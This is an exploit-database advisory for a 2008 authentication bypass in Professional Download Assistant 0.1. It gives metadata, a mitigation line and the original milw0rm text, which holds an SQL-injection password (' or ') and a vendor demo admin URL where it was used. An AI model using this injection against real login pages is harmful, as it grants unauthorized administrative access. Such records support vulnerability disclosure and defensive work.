Professional Download Assistant 0.1 Bypass

vendor:

Professional Download Assistant

by:

ZoRLu

8.5

CVSS

HIGH

Bypass

287

CWE

Product Name: Professional Download Assistant

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:dotnetindex:professional_download_assistant

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Professional Download Assistant 0.1 Bypass

A vulnerability in Professional Download Assistant 0.1 allows an attacker to bypass authentication by using the username 'ZoRLu' and the password ' or '.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.

Source

Exploit-DB raw data:

[~] Professional Download Assistant 0.1 Bypass
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Date: 08/12/2008
[~]
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp for demo: 

http://www.dotnetindex.com/demos/prodownloadmanager/admin/

user: ZoRLu

passwd: ' or '

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-09]